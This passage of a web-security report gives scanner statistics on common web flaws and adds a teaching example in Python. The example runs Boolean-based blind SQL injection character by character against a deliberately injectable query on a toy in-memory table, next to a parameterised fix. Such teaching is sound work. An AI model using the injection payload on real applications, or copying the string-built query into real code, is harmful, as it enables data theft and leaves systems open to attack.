Most common vulnerabilities found:
Of the 269 vulnerabilities the Netsparker web vulnerability scanner identified:
180 were Cross-site Scripting vulnerabilities, including reflected, stored and DOM-based XSS, and XSS via remote file inclusion (RFI).
55 were SQL Injection vulnerabilities, including Boolean-based and time-based blind SQL injections, where the attacker never sees query output and instead infers data from a true/false page difference or a response delay.
16 were File Inclusion vulnerabilities, both remote (RFI) and local (LFI).
The remaining 18 were CSRF, Remote Command Execution, Command Injection, Open Redirection, HTTP Header Injection (a web server software issue rather than an application one) and Frame Injection.
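The Boolean-based blind SQL injection mentioned in the SQL Injection item above, shown end to end as an added example (this is illustrative code, not Netsparker's scanner logic or any application from the report). It assumes a hypothetical lookup that only reveals whether a user name exists, uses a constructed in-memory SQLite table with fake data, and recovers a column one character at a time by asking that single yes/no question repeatedly; the same loop becomes a time-based blind injection when the oracle measures response delay instead of page content. The parameterised variant beside it shows why bound parameters stop the attack.

```python
import sqlite3
import string

# Constructed sample data for the demonstration only: one users table holding
# a secret that the injection will recover. Not real data.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "admin", "s3cr3t"), (2, "guest", "guest")])
    con.commit()
    return con

def user_exists_vulnerable(con, name):
    # Hypothetical injectable lookup: the query is built by string
    # concatenation, so the caller's input is parsed as SQL. The function
    # leaks only one bit (row found or not), which is all a Boolean-based
    # blind injection needs.
    sql = "SELECT id FROM users WHERE name = '" + name + "'"
    return con.execute(sql).fetchone() is not None

def user_exists_safe(con, name):
    # Same check with a bound parameter: the input is data, never SQL.
    return con.execute("SELECT id FROM users WHERE name = ?", (name,)).fetchone() is not None

def blind_extract(oracle, column, row_filter, max_len=32):
    # oracle(injected_value) -> True when the application showed its "found"
    # state. One yes/no question is asked per (position, candidate byte).
    # Comparing against char(N) keeps quotes out of the payload so it stays
    # well-formed inside the original string literal; the trailing "--"
    # comments out the application's closing quote.
    alphabet = string.ascii_letters + string.digits + string.punctuation
    recovered = ""
    for pos in range(1, max_len + 1):
        hit = None
        for ch in alphabet:
            payload = (
                f"x' OR (SELECT substr({column},{pos},1) FROM users "
                f"WHERE {row_filter}) = char({ord(ch)}) --"
            )
            if oracle(payload):
                hit = ch
                break
        if hit is None:  # substr() past the end returns '', so no candidate matches
            break
        recovered += hit
    return recovered

def demo():
    con = make_db()
    # Against the concatenated query the secret comes out character by character.
    leaked = blind_extract(lambda v: user_exists_vulnerable(con, v), "secret", "id = 1")
    # Against the parameterised query every probe is just a user name that does
    # not exist, so nothing is recovered.
    blocked = blind_extract(lambda v: user_exists_safe(con, v), "secret", "id = 1")
    return leaked, blocked

if __name__ == "__main__":
    print(demo())
```

Each character costs at most one request per alphabet entry, which is why scanners and tools such as sqlmap use bisection on the byte value rather than a linear scan; the oracle here is the only part that changes for a time-based variant, where a delay function in the injected condition replaces the visible "found" state.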
Cross-site scripting and SQL Injection have appeared in the OWASP Top 10 since the project started, mainly because they are both easy to find and easy to exploit. Yet, after years of raising awareness about them, the majority of the web applications in everyday use are still vulnerable to these types of vulnerabilities.